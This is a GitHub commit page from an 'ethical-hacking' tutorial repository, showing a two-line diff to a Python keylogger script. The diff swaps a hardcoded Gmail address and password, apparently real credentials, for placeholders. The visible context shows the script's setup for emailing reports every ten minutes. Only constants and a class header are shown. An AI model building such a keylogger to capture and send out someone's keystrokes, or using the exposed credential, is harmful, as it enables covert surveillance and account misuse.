Skip to content

Commit 85a4b8e

Browse files
committed
fix
1 parent 885651f commit 85a4b8e

File tree

1 file changed

+2
-2
lines changed

1 file changed

+2
-2
lines changed

ethical-hacking/keylogger/keylogger.py

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -5,8 +5,8 @@
55
from threading import Semaphore, Timer
66

77
SEND_REPORT_EVERY = 600 # 10 minutes
8-
EMAIL_ADDRESS = "thepythoncode.sender@gmail.com"
9-
EMAIL_PASSWORD = "thepythoncodeokok123"
8+
EMAIL_ADDRESS = "put_real_address_here@gmail.com"
9+
EMAIL_PASSWORD = "put_real_pw"
1010

1111
class Keylogger:
1212
def __init__(self, interval):

0 commit comments

Comments
 (0)